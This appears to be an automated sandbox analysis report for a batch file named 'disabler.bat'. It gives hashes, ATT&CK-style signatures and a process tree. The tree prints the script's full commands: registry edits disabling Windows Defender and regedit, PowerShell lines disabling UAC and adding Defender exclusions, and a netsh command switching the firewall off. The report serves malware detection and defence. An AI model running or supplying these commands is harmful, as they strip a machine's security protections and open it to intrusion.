Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/01/2025, 05:12

General

  • Target

    disabler.bat

  • Size

    2KB

  • MD5

    c6aff26267067b25326560e96a81513f

  • SHA1

    e45b8c290c2e9cf625ce255f6d31dda440e3d61e

  • SHA256

    c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79

  • SHA512

    d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2404
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2768
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        2⤵
          PID:2824
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f
          2⤵
            PID:2760
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f
            2⤵
              PID:2688
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f
              2⤵
                PID:2692
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f
                2⤵
                  PID:2244
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f
                  2⤵
                    PID:2976
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
                    2⤵
                    • UAC bypass
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2852
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2612
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -PUAProtection Disabled"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2728
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:812
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3048
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2800
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1648
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -ScanScheduleDay 8"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1100
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall set allprofiles state off
                    2⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1996
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
                    2⤵
                    • Disables RegEdit via registry modification
                    PID:548

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                        Filesize

                        7KB

                        MD5

                        ba82edd25c65cb9256d9250fdc1ef4df

                        SHA1

                        dc079b101d43a9f11f4dc0db060aefbe9b05c05e

                        SHA256

                        915a13ceb17014ef3cf432157a2c88bc019a2129bf43015750bc86d1b5080a08

                        SHA512

                        d1d6c8b9c468412c65fc6fbac90f69db30e7363c22340cc7f9f9a5840a30ad0d503dfbd2734ba0a997eeec90ad78ec983541afffe31a9fba497dc653ccaa2433

                      • memory/2612-12-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/2612-13-0x0000000001D90000-0x0000000001D98000-memory.dmp

                        Filesize

                        32KB

                      • memory/2852-4-0x0000000002D00000-0x0000000002D80000-memory.dmp

                        Filesize

                        512KB

                      • memory/2852-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/2852-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

                        Filesize

                        32KB